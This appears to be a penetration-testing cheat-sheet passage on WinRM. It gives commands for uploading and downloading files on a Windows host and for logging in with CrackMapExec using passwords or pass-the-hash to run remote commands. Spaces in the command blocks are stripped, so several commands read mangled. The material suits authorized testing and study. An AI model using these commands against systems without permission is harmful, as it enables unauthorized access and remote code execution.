The Microsoft implementation of WS-Management Protocol which provides a common way for systems to access and exchange management information across an IT infrastructure. Default ports are 5985 (HTTP),
After connecting, we can use a lot of useful commands to exploit.
Note that we need to specify the absolute path for uploading and downloading.
# Upload a local file to Windows machinePS> upload ./example.bat c:\\Users\Administrator\Desktop\exploit.bat# Download a file to localPS> download c:\\Users\Administrator\Desktop\example.txt ./example.txt# List all servicesPS> servicesCopied!
CrackMapExec is a swiss army knife for pentesting networks.
The official docs says that it's recommended to use it via Poetry which is a Python package manager.
First off, move to the directory in which the CrackMapExec installed and run poetry install.
cdcrackmapexecpoetryinstallCopied!
Then execute with poetry run.
# Login and CMD execution (-x)poetryruncrackmapexecwinrm<target-ip>-dDomainName-uusername-ppassword-x'whoami'# Login and PowerShell execution (-X)poetryruncrackmapexecwinrm<target-ip>-dDomainName-uusername-ppassword-X'$PSVersionTable'# Pass the Hash and CMD execution (-x)poetryruncrackmapexecwinrm<target-ip>-dDomainName-uusername-H<HASH>-x'whoami'# Pass the Hash and PowerShell execution (-X)poetryruncrackmapexecwinrm<target-ip>-dDomainName-uusername-H<HASH>-X'$PSVersionTable'Copied!